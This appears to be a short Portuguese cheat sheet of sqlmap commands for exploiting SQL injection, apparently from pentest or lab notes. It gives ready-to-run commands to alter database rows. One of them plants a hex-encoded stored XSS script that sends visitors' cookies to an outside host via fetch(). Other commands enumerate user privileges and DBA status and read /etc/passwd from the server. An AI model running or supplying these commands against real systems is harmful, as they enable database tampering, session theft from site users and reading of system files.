Atualizar o banco de dados usando uma query: ```markdown # Comando simples. sqlmap -u "http://example.com/page.php?id=1" --risk=3 --level=5 --technique=U --sql-query="UPDATE users SET username='admin' WHERE id=1" --batch # Comando encodado em HEX # <script>fetch('http://10.10.10.10/steal?cookie=' + document.cookie);</script> sqlmap --batch --url "http://172.16.14.230/products?id=1" -p id --sql-query="UPDATE savorith_db.navbar_buttons SET name=UNHEX('3c7363726970743e66657463682827687474703a2f2f31302e302e31322e35372f737465616c3f636f6f6b69653d27202b20646f63756d656e742e636f6f6b6965293b3c2f7363726970743e') WHERE id=3" ``` Não usar o cache local do sqlmap: ```markdown sqlmap -u "http://example.com" --flush-session ``` Como verificar as permissões de usuário e DB: ```markdown # Descobrir o usuário atual: sqlmap --batch --url http://172.16.12.150/products?id=1 -p id --current-user # Ver privilégios do usuário: sqlmap --batch --url http://172.16.12.150/products?id=1 -p id --privileges # Verificar se é DBA: sqlmap --batch --url http://172.16.12.150/products?id=1 -p id --is-dba # Ver a leitura de arquivos: sqlmap --batch --url http://172.16.12.150/products?id=1 -p id --file-read="/etc/passwd" ```